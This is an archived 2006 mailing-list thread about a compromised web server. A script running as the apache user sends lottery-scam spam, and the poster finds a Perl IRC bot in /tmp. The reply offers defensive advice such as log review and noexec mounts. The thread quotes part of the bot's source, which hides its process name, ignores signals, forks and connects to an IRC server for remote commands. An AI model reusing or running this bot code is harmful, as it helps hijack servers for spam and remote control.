-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 23 May 2006 13:11:46 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:
> CodeHeads wrote:
> >> There is something wrong but I cannot nail it down.
> >>
> >> I am receiving hundreds of bounce backs from the web server I am running.
> >> Not sure how they are sending mail. The only mail that should be sent is
> >> from forms. Here is a header of one of queues. Maybe someone has run
> >> into this.
> >>
> >> V8
> >> T1147739033
> >> K1147739138
> >> N1
> >> P34672
> >> Mhost map: lookup (zdnetmail.com): deferred
> >> F8bs
> >> $_apache@localhost
> >> ${daemon_flags}c u
> >> Sapache
> >> Aapache@xxxxxxxxxxxxxx
> >> rRFC822; galactica7@xxxxxxxxxxxxx
> >> RPFD:galactica7@xxxxxxxxxxxxx
> >> H?P?Return-Path: <<81>g>
> >> H??Received: (from apache@localhost)
> >> by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> >> Mon, 15 May 2006 20:23:53 -0400
> >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> >> H?x?Full-Name: Apache
> >> H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx>
> >> H??To: galactica7@xxxxxxxxxxxxx
> >> H??Subject: WINNING NOTIFICATION
> >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx>
> >>
> >> What is bothering me is this:
> >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
>
> Right, that should tell you that the mail headers you are looking at
> seem to be generated by something running as user apache (probably a
> CGI/PHP script of some kind running via your web server), which is
> calling the local sendmail on that server to send the mail out. It's
> nothing to do with postfix at all.
>
> > Sorry again, but looky what I found in the /tmp dir:
> > The whole thing is not copy and pasted:
> > #!/usr/bin/perl
> > # r00t teh pl4net! gr33t t0 Myhack@DALnet
> > # ------[eof]-----
> >
> >
> >
> > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
> > $1;}'`");
> >
> >
> > my $processo = 'httpd';
> >
> > # morgan the code that you need to rip ends here
> >
> > my @titi = ("Cube-|");
> >
> > my $sleep='5';
> > my $linas_max='4';
> > my @adms=("apaii","KingFighter");
> > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> > my @canais=("#conn");
> > my $nick= $titi[rand scalar @titi];
> > my $ircname = $titi[rand scalar @titi];
> > chop (my $realname = $titi[rand scalar @titi]);
> >
> > $servidor='rumble.dal.net' unless $servidor;
> > my $porta='6667';
> > my $VERSAO = '0.5';
> > $SIG{'INT'} = 'IGNORE';
> > $SIG{'HUP'} = 'IGNORE';
> > $SIG{'TERM'} = 'IGNORE';
> > $SIG{'CHLD'} = 'IGNORE';
> > $SIG{'PS'} = 'IGNORE';
> > use IO::Socket;
> > use Socket;
> > use IO::Select;
> > chdir("/");
> > $servidor="$ARGV[0]" if $ARGV[0];
> > $0="$processo"."\0"x16;;
> > my $pid=fork;
> > exit if $pid;
> > die "Problema com o fork: $!" unless defined($pid);
> >
> > our %irc_servers;
> > our %DCC;
> > my $dcc_sel = new IO::Select->new();
> >
> > $sel_cliente = IO::Select->new();
> > sub sendraw {
> > if ($#_ == '1') {
> > my $socket = $_[0];
> > print $socket "$_[1]\n";
> > } else {
> > print $IRC_cur_socket "$_[0]\n";
> > }
> > }
> >
> > sub conectar {
> > my $meunick = $_[0];
> > my $servidor_con = $_[1];
> > my $porta_con = $_[2];
> >
> > my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> > PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
> > (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
> >
> > What I cannot understand is how someone can upload to the tmp dir. I guess
> > I am still learning. Can someone shed some light on this?
>
> This is communicating with an IRC server, probably to listen for commands.
>
> Look at the owner of the script. If it's apache, you can safely say that
> a webserver exploit was used to upload it. You could try looking at the
> timestamp of the file, and look in your web server log files for
> suspicious activity at around that time to get a clue as to how it got
> there.
>
> If you have /tmp on a separate partition, I'd seriously consider
> mounting it noexec,nodev. If it's not a separate partition, I'd
> seriously consider making one for it on an Internet-exposed web server.
> Same goes for /var.
>
> Paul.
>
That has since been removed and the system re done. I have been keeping an eye
on /tmp and /var/tmp.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ
Unhz/IKmEViCNj3G+YzEZdk=
=T6xG
-----END PGP SIGNATURE-----
